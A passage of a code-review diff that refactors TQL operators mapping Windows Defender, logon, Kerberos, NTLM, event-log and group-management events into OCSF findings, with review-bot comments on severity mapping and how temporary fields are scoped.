@@ -2,17 +2,22 @@ description: > Windows Defender Malware Detection/Remediation (EID 1116 Detected, 1117 Action Taken) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.metadata.profiles = ["host", "security_control"] +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.metadata.profiles = ["host", "security_control"] -ocsf.severity_id = move windows.EventData["Severity ID"] +$event.ocsf.severity_id = move $event.windows.EventData["Severity ID"] // Defender Action IDs → OCSF disposition_id (present on EID 1117). let $dispositions = { 
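Review bot: `$event.ocsf.severity_id = move $event.windows.EventData["Severity ID"]` copies the Defender numeric severity straight into OCSF severity_id, whereas defender_threat.tql maps the severity name through a `$severities` table; if the two scales do not coincide value-for-value (I cannot confirm that from the hunk), the two operators will report different severities for the same threat. A short comment stating that the Defender scale is intentionally reused as-is, or a lookup mirroring `$severities`, would make the choice explicit.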
@@ -23,55 +28,55 @@ let $dispositions = { "9": 16, // No Action → No Action "10": 2, // Block → Blocked } -if windows.EventData.has("Action ID") { - ocsf.disposition_id = $dispositions[(move windows.EventData["Action ID"]).string()]? else 99 +if $event.windows.EventData.has("Action ID") { + $event.ocsf.disposition_id = $dispositions[(move $event.windows.EventData["Action ID"]).string()]? else 99 } // Threat name is copied into finding_info.title then moved into malware.name. -ocsf.finding_info = { - title: windows.EventData["Threat Name"], - uid: move windows.EventData["Detection ID"], - types: [move windows.EventData["Category Name"]], +$event.ocsf.finding_info = { + title: $event.windows.EventData["Threat Name"], + uid: move $event.windows.EventData["Detection ID"], + types: [move $event.windows.EventData["Category Name"]], } -ocsf.malware = [{ - name: move windows.EventData["Threat Name"], +$event.ocsf.malware = [{ + name: move $event.windows.EventData["Threat Name"], }] // Detected file; wrap in evidences as required by Detection Finding. -ocsf.file = { - path: move windows.EventData.Path, +$event.ocsf.file = { + path: move $event.windows.EventData.Path, type_id: 1, // Regular file } -ocsf.file.name = ocsf.file.path.split("\\")[-1] -ocsf.evidences = [{ file: move ocsf.file }] +$event.ocsf.file.name = $event.ocsf.file.path.split("\\")[-1] +$event.ocsf.evidences = [{ file: move $event.ocsf.file }] // Process that triggered the detection. 
-ocsf.actor = { +$event.ocsf.actor = { process: { - path: move windows.EventData["Process Name"], + path: move $event.windows.EventData["Process Name"], file: { type_id: 1 }, }, } -ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] -ocsf.actor.process.file.name = ocsf.actor.process.name -ocsf.actor.process.file.path = ocsf.actor.process.path +$event.ocsf.actor.process.name = $event.ocsf.actor.process.path.split("\\")[-1] +$event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name +$event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path // Detection User is "DOMAIN\username" format. -_user = (move windows.EventData["Detection User"]).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData["Detection User"]).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } drop _user // Drop sentinel/redundant fields. -drop windows.EventData.Unused -drop windows.EventData.Unused2 -drop windows.EventData.Unused3 -drop windows.EventData["Severity Name"] -drop windows.EventData["Action Name"] -drop windows.EventData["Type Name"] -drop windows.EventData["Origin Name"] -drop windows.EventData["Execution Name"] -drop windows.EventData["Status Description"] -drop windows.EventData["Remediation User"] +drop $event.windows.EventData.Unused +drop $event.windows.EventData.Unused2 +drop $event.windows.EventData.Unused3 +drop $event.windows.EventData["Severity Name"] +drop $event.windows.EventData["Action Name"] +drop $event.windows.EventData["Type Name"] +drop $event.windows.EventData["Origin Name"] +drop $event.windows.EventData["Execution Name"] +drop $event.windows.EventData["Status Description"] +drop $event.windows.EventData["Remediation User"] diff --git a/microsoft/operators/windows/ocsf/events/defender_signature_update.tql b/microsoft/operators/windows/ocsf/events/defender_signature_update.tql index e446ecc..0bc5f15 100644 --- a/microsoft/operators/windows/ocsf/events/defender_signature_update.tql 
+++ b/microsoft/operators/windows/ocsf/events/defender_signature_update.tql @@ -2,15 +2,20 @@ description: > Windows Defender Signature Update (EID 2000) → Base Event (0, 0) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.base_event" -ocsf.category_uid = 0 -ocsf.class_uid = 0 -ocsf.activity_id = 0 -ocsf.type_uid = 0 +$event.ocsf.category_uid = 0 +$event.ocsf.class_uid = 0 +$event.ocsf.activity_id = 0 +$event.ocsf.type_uid = 0 // Signature version details stay in unmapped for downstream consumers. // "Product Name" is redundant with metadata.product.name. -drop windows.EventData["Product Name"]? +drop $event.windows.EventData["Product Name"]? diff --git a/microsoft/operators/windows/ocsf/events/defender_tamper.tql b/microsoft/operators/windows/ocsf/events/defender_tamper.tql index 6fcbcb0..41c8986 100644 --- a/microsoft/operators/windows/ocsf/events/defender_tamper.tql +++ b/microsoft/operators/windows/ocsf/events/defender_tamper.tql 
@@ -2,27 +2,32 @@ description: > Windows Defender Tamper Events (EID 5001 Real-Time Protection Disabled, 5007 Configuration Changed) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // AV tamper events are always high-severity. -ocsf.severity_id = 4 // High +$event.ocsf.severity_id = 4 // High let $titles = { "5001": "Windows Defender Real-Time Protection Disabled", "5007": "Windows Defender Configuration Changed", } -ocsf.finding_info = { - title: $titles[ocsf.metadata.event_code]? else "Windows Defender Tamper", - uid: ocsf.metadata.original_event_uid, +$event.ocsf.finding_info = { + title: $titles[$event.ocsf.metadata.event_code]? else "Windows Defender Tamper", + uid: $event.ocsf.metadata.original_event_uid, types: ["Software: Antivirus"], } // "Product Name" is redundant with metadata.product.name. -drop windows.EventData["Product Name"] +drop $event.windows.EventData["Product Name"] diff --git a/microsoft/operators/windows/ocsf/events/defender_threat.tql b/microsoft/operators/windows/ocsf/events/defender_threat.tql index c292099..e9dc983 100644 --- a/microsoft/operators/windows/ocsf/events/defender_threat.tql +++ b/microsoft/operators/windows/ocsf/events/defender_threat.tql 
@@ -2,15 +2,20 @@ description: > Windows Defender Threat Found/Action (EID 1006 Found, 1007 Action) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.metadata.profiles = ["host", "security_control"] +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.metadata.profiles = ["host", "security_control"] // Map string severity name to OCSF severity_id. let $severities = { @@ -19,7 +24,7 @@ let $severities = { "High": 4, "Severe": 5, } -ocsf.severity_id = $severities[move windows.EventData.Severity]? else 0 +$event.ocsf.severity_id = $severities[move $event.windows.EventData.Severity]? else 0 // Action string → OCSF disposition_id (EID 1007 only). let $dispositions = { 
@@ -29,46 +34,46 @@ let $dispositions = { "Allow": 1, // Allowed "Block": 2, // Blocked } -if windows.EventData.has("Action") { - ocsf.disposition_id = $dispositions[move windows.EventData.Action]? else 99 +if $event.windows.EventData.has("Action") { + $event.ocsf.disposition_id = $dispositions[move $event.windows.EventData.Action]? else 99 } // Threat name is copied into finding_info.title then moved into malware.name. -ocsf.finding_info = { - title: windows.EventData["Threat Name"], - uid: (move windows.EventData.ID).string(), - types: [move windows.EventData.Category], +$event.ocsf.finding_info = { + title: $event.windows.EventData["Threat Name"], + uid: (move $event.windows.EventData.ID).string(), + types: [move $event.windows.EventData.Category], } -ocsf.malware = [{ - name: move windows.EventData["Threat Name"], +$event.ocsf.malware = [{ + name: move $event.windows.EventData["Threat Name"], }] // Detected file; wrap in evidences as required by Detection Finding (EID 1006 only). -if windows.EventData.Path? != null { - ocsf.file = { - path: move windows.EventData.Path, +if $event.windows.EventData.Path? != null { + $event.ocsf.file = { + path: move $event.windows.EventData.Path, type_id: 1, // Regular file } - ocsf.file.name = ocsf.file.path.split("\\")[-1] - ocsf.evidences = [{ file: move ocsf.file }] + $event.ocsf.file.name = $event.ocsf.file.path.split("\\")[-1] + $event.ocsf.evidences = [{ file: move $event.ocsf.file }] } // Process that triggered the detection (EID 1006 only). -if windows.EventData["Process Name"]? != null { - ocsf.actor = { +if $event.windows.EventData["Process Name"]? 
!= null { + $event.ocsf.actor = { process: { - path: move windows.EventData["Process Name"], + path: move $event.windows.EventData["Process Name"], file: { type_id: 1 }, }, } - ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] - ocsf.actor.process.file.name = ocsf.actor.process.name - ocsf.actor.process.file.path = ocsf.actor.process.path + $event.ocsf.actor.process.name = $event.ocsf.actor.process.path.split("\\")[-1] + $event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name + $event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path } // User is "DOMAIN\username" format. -_user = (move windows.EventData.User).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData.User).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } diff --git a/microsoft/operators/windows/ocsf/events/eventlog_clear.tql b/microsoft/operators/windows/ocsf/events/eventlog_clear.tql index c73ed80..0b7f023 100644 --- a/microsoft/operators/windows/ocsf/events/eventlog_clear.tql +++ b/microsoft/operators/windows/ocsf/events/eventlog_clear.tql 
@@ -1,29 +1,34 @@ --- description: Audit Log Cleared (EID 1102) → OCSF Event Log Activity (1008, Clear) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.event_log_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1008 -ocsf.activity_id = 1 // Clear -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1008 +$event.ocsf.activity_id = 1 // Clear +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Clearing the security audit log is a high-severity indicator of an attacker // covering their tracks (MITRE ATT&CK T1070.001). -ocsf.severity_id = 4 // High +$event.ocsf.severity_id = 4 // High -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, process: { - pid: int(move windows.EventData.ClientProcessId, base=16), + pid: int(move $event.windows.EventData.ClientProcessId, base=16), }, } diff --git a/microsoft/operators/windows/ocsf/events/eventlog_start.tql b/microsoft/operators/windows/ocsf/events/eventlog_start.tql index de3d2fa..f25ffa6 100644 --- a/microsoft/operators/windows/ocsf/events/eventlog_start.tql +++ b/microsoft/operators/windows/ocsf/events/eventlog_start.tql 
@@ -1,16 +1,21 @@ --- description: Event Log Service Started (EID 6005) → OCSF Windows Service Activity (201004, Start) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 3 // Start -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 3 // Start +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.win_service = { +$event.ocsf.win_service = { name: "Windows Event Log", } -drop windows.EventData +drop $event.windows.EventData diff --git a/microsoft/operators/windows/ocsf/events/eventlog_stop.tql b/microsoft/operators/windows/ocsf/events/eventlog_stop.tql index ea4424a..88ff085 100644 --- a/microsoft/operators/windows/ocsf/events/eventlog_stop.tql +++ b/microsoft/operators/windows/ocsf/events/eventlog_stop.tql @@ -1,16 +1,21 @@ --- description: Event Log Service Stopped (EID 6006) → OCSF Windows Service Activity (201004, Stop) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 4 // Stop -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 4 // Stop +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.win_service = { +$event.ocsf.win_service = { name: "Windows Event Log", } -drop windows.EventData +drop $event.windows.EventData diff --git a/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql b/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql index c37fb5a..091617e 100644 --- a/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql 
+++ b/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql 
@@ -1,50 +1,55 @@ --- description: Logon with Explicit Credentials (EID 4648) → OCSF Authentication (3002, Logon) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // EID 4648 records the attempt, not the outcome; no status is available. -ocsf.user = { - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } // The process that called LogonUser/CreateProcessWithLogonW. -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid: move windows.EventData.LogonGuid, - uid_alt: move windows.EventData.SubjectLogonId, + uid: move $event.windows.EventData.LogonGuid, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, process: { - pid: int(move windows.EventData.ProcessId, base=16), - path: move windows.EventData.ProcessName, + pid: int(move $event.windows.EventData.ProcessId, base=16), + path: move $event.windows.EventData.ProcessName, file: { type_id: 8 }, }, } -ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] -ocsf.actor.process.file.name = ocsf.actor.process.name -ocsf.actor.process.file.path = ocsf.actor.process.path +$event.ocsf.actor.process.name = 
$event.ocsf.actor.process.path.split("\\")[-1] +$event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name +$event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path -ocsf.dst_endpoint = { - hostname: move windows.EventData.TargetServerName, +$event.ocsf.dst_endpoint = { + hostname: move $event.windows.EventData.TargetServerName, } // Where the logon originated from (may differ from the actor's host in lateral movement). -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, } // TargetLogonGuid and TargetInfo stay in unmapped; no clean OCSF mapping. diff --git a/microsoft/operators/windows/ocsf/events/group_management.tql b/microsoft/operators/windows/ocsf/events/group_management.tql index 89ddaa9..469781f 100644 --- a/microsoft/operators/windows/ocsf/events/group_management.tql +++ b/microsoft/operators/windows/ocsf/events/group_management.tql @@ -2,12 +2,17 @@ description: > Security Group Lifecycle (EID 4727–4730 global, 4731–4734 local, 4754–4758 universal) → OCSF Group Management (3006) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.group_management" -ocsf.category_uid = 3 -ocsf.class_uid = 3006 +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3006 let $activities = { // Create group 
@@ -21,34 +26,34 @@ let $activities = { // Group changed (universal group modified — no closer activity) "4755": 99, } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } // TargetUser* fields describe the group being acted on (not a user account). -ocsf.group = { - uid: move windows.EventData.TargetSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.group = { + uid: move $event.windows.EventData.TargetSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } // Member fields only present on add/remove events (4728/4729/4732/4733/4756/4757). -if windows.EventData.MemberSid? != null { - ocsf.user = { - uid: move windows.EventData.MemberSid, - name: move windows.EventData.MemberName, +if $event.windows.EventData.MemberSid? != null { + $event.ocsf.user = { + uid: move $event.windows.EventData.MemberSid, + name: move $event.windows.EventData.MemberName, } } // PrivilegeList is always "-" on these events; drop to keep unmapped clean. -drop windows.EventData.PrivilegeList +drop $event.windows.EventData.PrivilegeList 
diff --git a/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql b/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql index 8c0e62d..517c372 100644 --- a/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql +++ b/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql @@ -1,26 +1,31 @@ --- description: Kerberos Pre-Authentication Failed (EID 4771) → OCSF Authentication (3002, Authentication Ticket/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 3 // Authentication Ticket (TGT request) -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 3 // Authentication Ticket (TGT request) +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure — pre-auth always fails for this EID -ocsf.severity_id = 2 // Low -ocsf.status_code = move windows.EventData.Status // Kerberos error code (e.g. 0x18 = wrong password) +$event.ocsf.status_id = 2 // Failure — pre-auth always fails for this EID +$event.ocsf.severity_id = 2 // Low +$event.ocsf.status_code = move $event.windows.EventData.Status // Kerberos error code (e.g. 0x18 = wrong password) -ocsf.user = { - uid: move windows.EventData.TargetSid, - name: move windows.EventData.TargetUserName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetSid, + name: move $event.windows.EventData.TargetUserName, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, } // PreAuthType, TicketOptions, ServiceName — unmapped. 
diff --git a/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql b/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql index 551a68f..83f49e1 100644 --- a/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql +++ b/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql 
@@ -1,39 +1,44 @@ --- description: Kerberos Service Ticket Requested (EID 4769) → OCSF Authentication (3002, Service Ticket) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 4 // Service Ticket -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 4 // Service Ticket +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Status 0x0 = success; anything else = failure (e.g. 0x1F = no TGT). -ocsf.status_id = 1 if windows.EventData.Status == "0x0" else 2 -ocsf.status_code = move windows.EventData.Status +$event.ocsf.status_id = 1 if $event.windows.EventData.Status == "0x0" else 2 +$event.ocsf.status_code = move $event.windows.EventData.Status // TargetUserName usually includes @REALM (e.g. "jdoe@CORP.LOCAL"); split off // the realm into domain. Fall back to TargetDomainName when no @ is present. -_parts = (move windows.EventData.TargetUserName).split("@") -ocsf.user = { +_parts = (move $event.windows.EventData.TargetUserName).split("@") +$event.ocsf.user = { name: _parts[0], - domain: _parts[1]? else move windows.EventData.TargetDomainName, + domain: _parts[1]? else move $event.windows.EventData.TargetDomainName, } drop _parts -ocsf.dst_endpoint = { - svc_name: move windows.EventData.ServiceName, +$event.ocsf.dst_endpoint = { + svc_name: move $event.windows.EventData.ServiceName, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, } // The logon GUID links this TGS request back to the original TGT logon event. 
-ocsf.session = { - uid: move windows.EventData.LogonGuid, +$event.ocsf.session = { + uid: move $event.windows.EventData.LogonGuid, } // TicketOptions, TicketEncryptionType, ServiceSid, TransmittedServices — unmapped. diff --git a/microsoft/operators/windows/ocsf/events/logon.tql b/microsoft/operators/windows/ocsf/events/logon.tql index 0c7ceea..b6b3573 100644 --- a/microsoft/operators/windows/ocsf/events/logon.tql +++ b/microsoft/operators/windows/ocsf/events/logon.tql 
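Review bot: `_parts = (move $event.windows.EventData.TargetUserName).split("@")` and the matching `drop _parts` still write a top-level field while every other write in this hunk was moved under `$event`; if the caller ever passes a sub-record as `event`, the temporary lands outside the record being built, and an input that already has a `_parts` field is silently clobbered. If per-event temporaries are needed, scoping them the same way, `$event._parts = …` with `drop $event._parts`, keeps the operator self-contained; I am not certain the dialect offers a cleaner per-event binding. The same `_user` pattern appears in the powershell_error.tql, task_lifecycle.tql and task_run.tql hunks below.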
@@ -1,47 +1,52 @@ --- description: Successful Logon (EID 4624) → OCSF Authentication (3002, Logon) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 1 // Success +$event.ocsf.status_id = 1 // Success // Windows LogonType integers map directly to OCSF logon_type_id values // (Interactive=2, Network=3, Batch=4, Service=5, Unlock=7, NetworkCleartext=8, // NewCredentials=9, RemoteInteractive=10, CachedInteractive=11, …). -ocsf.logon_type_id = move windows.EventData.LogonType +$event.ocsf.logon_type_id = move $event.windows.EventData.LogonType -ocsf.user = { - uid: move windows.EventData.TargetUserSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetUserSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, - hostname: move windows.EventData.WorkstationName, +$event.ocsf.src_endpoint = { + ip: move 
$event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, + hostname: move $event.windows.EventData.WorkstationName, } -ocsf.auth_protocol = move windows.EventData.AuthenticationPackageName +$event.ocsf.auth_protocol = move $event.windows.EventData.AuthenticationPackageName -ocsf.session = { - uid: move windows.EventData.LogonGuid, - uid_alt: move windows.EventData.TargetLogonId, +$event.ocsf.session = { + uid: move $event.windows.EventData.LogonGuid, + uid_alt: move $event.windows.EventData.TargetLogonId, } diff --git a/microsoft/operators/windows/ocsf/events/logon_failed.tql b/microsoft/operators/windows/ocsf/events/logon_failed.tql index 3e08e63..0521483 100644 --- a/microsoft/operators/windows/ocsf/events/logon_failed.tql +++ b/microsoft/operators/windows/ocsf/events/logon_failed.tql 
@@ -1,42 +1,47 @@ --- description: Failed Logon (EID 4625) → OCSF Authentication (3002, Logon/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 2 // Low — single failed logon; brute-force detection is a higher layer -ocsf.status_code = move windows.EventData.Status // hex NTSTATUS (e.g. 0xC000006D = wrong credentials) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 2 // Low — single failed logon; brute-force detection is a higher layer +$event.ocsf.status_code = move $event.windows.EventData.Status // hex NTSTATUS (e.g. 0xC000006D = wrong credentials) // Windows LogonType integers map directly to OCSF logon_type_id values. 
-ocsf.logon_type_id = move windows.EventData.LogonType +$event.ocsf.logon_type_id = move $event.windows.EventData.LogonType -ocsf.user = { - uid: move windows.EventData.TargetUserSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetUserSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, - hostname: move windows.EventData.WorkstationName, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, + hostname: move $event.windows.EventData.WorkstationName, } -ocsf.auth_protocol = move windows.EventData.AuthenticationPackageName +$event.ocsf.auth_protocol = move $event.windows.EventData.AuthenticationPackageName diff --git a/microsoft/operators/windows/ocsf/events/ntlm_auth.tql b/microsoft/operators/windows/ocsf/events/ntlm_auth.tql index ef7727a..268137a 100644 --- a/microsoft/operators/windows/ocsf/events/ntlm_auth.tql +++ b/microsoft/operators/windows/ocsf/events/ntlm_auth.tql 
@@ -1,20 +1,25 @@ --- description: NTLM Authentication (EID 4776) → OCSF Authentication (3002, Logon) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Status 0x0 = success; non-zero = failure (e.g. 0xC000006A = wrong password). -ocsf.status_id = 1 if windows.EventData.Status == "0x0" else 2 -ocsf.status_code = move windows.EventData.Status +$event.ocsf.status_id = 1 if $event.windows.EventData.Status == "0x0" else 2 +$event.ocsf.status_code = move $event.windows.EventData.Status -ocsf.user = { - name: move windows.EventData.TargetUserName, +$event.ocsf.user = { + name: move $event.windows.EventData.TargetUserName, } // PackageName identifies the NTLM variant; map to auth_protocol_id so that @@ -23,9 +28,9 @@ let $protocols = { "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0": 1, // NTLM v1 "NTLM": 1, } -ocsf.auth_protocol_id = $protocols[windows.EventData.PackageName]? else 99 -drop windows.EventData.PackageName +$event.ocsf.auth_protocol_id = $protocols[$event.windows.EventData.PackageName]? else 99 +drop $event.windows.EventData.PackageName -ocsf.src_endpoint = { - hostname: move windows.EventData.Workstation, +$event.ocsf.src_endpoint = { + hostname: move $event.windows.EventData.Workstation, } diff --git a/microsoft/operators/windows/ocsf/events/powershell_error.tql b/microsoft/operators/windows/ocsf/events/powershell_error.tql index 570ce84..f61097b 100644 --- 